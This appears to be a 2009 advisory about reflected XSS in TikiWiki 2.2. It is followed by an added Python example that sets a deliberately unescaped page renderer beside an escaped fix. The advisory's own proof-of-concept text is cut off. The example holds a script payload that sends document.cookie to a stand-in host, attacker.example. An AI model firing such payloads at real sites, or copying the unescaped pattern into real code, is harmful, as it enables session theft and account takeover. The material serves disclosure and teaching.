Version: 2.2 (latest)
Bug: Active XSS in URI
Date: 12 Mar 2009
Discovered by: iliz
Contact: e-mail: iliz-z(at)yandex(dot)ru
TikiWiki version 2.2 and later embeds the request URI in the HTML response body without sanitizing it, and is therefore prone to an active (reflected) XSS attack: any markup an attacker places in the URL of a link the victim follows is returned to the victim's browser as part of the page.
PROOF OF CONCEPT:
browser, this can be exploited to steal cookies and escalate privileges to administrator.
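The following is an added illustration of the flaw class described above, not code from the advisory or from TikiWiki. It is written in Python rather than TikiWiki's PHP so that it runs stand-alone; the pattern (request URI copied into an HTML attribute unescaped) and the fix (escape for the HTML attribute context before output) are the same in either language. The URL path, query parameters and attacker host are constructed sample values, not a known injection point in TikiWiki.

```python
import html
from urllib.parse import quote, unquote

# Constructed sample input (not a real TikiWiki endpoint or a known injection
# point): a hypothetical page URL with an XSS payload tacked onto the query
# string. The payload closes the attribute it lands in, then injects a script
# that sends document.cookie to an attacker-controlled host (example domain).
PAYLOAD = ('"><script>new Image().src="http://attacker.example/?c="'
           '+encodeURIComponent(document.cookie)</script>')
ATTACK_URI = "/tiki-index.php?page=HomePage&x=" + PAYLOAD


def encoded_attack_uri() -> str:
    """Same attack with the payload percent-encoded, as a browser or a link
    shortener may send it; the server decodes it before echoing."""
    return "/tiki-index.php?page=HomePage&x=" + quote(PAYLOAD)


def render_vulnerable(request_uri: str) -> str:
    """The pattern the advisory describes: the raw request URI is written into
    the HTML body (here as a form action and a self-link) without escaping.
    Decoding first mirrors what many PHP applications do, so a percent-encoded
    payload is reflected just as effectively as a literal one."""
    uri = unquote(request_uri)
    return (
        "<html><body>\n"
        f'<form method="post" action="{uri}">\n'
        f'<a href="{uri}">this page</a>\n'
        '<input type="submit" value="Save">\n'
        "</form></body></html>"
    )


def render_fixed(request_uri: str) -> str:
    """Same page with the URI escaped for the HTML attribute context:
    &quot; cannot close the attribute and &lt;/&gt; cannot open a tag.
    (PHP equivalent: htmlspecialchars($uri, ENT_QUOTES).)"""
    uri = html.escape(unquote(request_uri), quote=True)
    return (
        "<html><body>\n"
        f'<form method="post" action="{uri}">\n'
        f'<a href="{uri}">this page</a>\n'
        '<input type="submit" value="Save">\n'
        "</form></body></html>"
    )


def reflects_unescaped(page: str, marker: str = "<script>") -> bool:
    """Does the marker reach the response verbatim, i.e. would the victim's
    browser parse it as markup rather than as attribute text?"""
    return marker in page


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        page = render(ATTACK_URI)
        print(f"[{label}] script reflected: {reflects_unescaped(page)}")
        print(page, end="\n\n")
```

Escaping at the point of output is the minimal fix; a stronger one is to stop echoing REQUEST_URI at all and rebuild the self-link from the script name and a whitelist of known parameters, so that unexpected query data never reaches the page.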
Tested with TikiWiki 2.2, Apache 2.2, Mozilla Firefox 3.0.6, Internet Explorer 7, Opera 9.65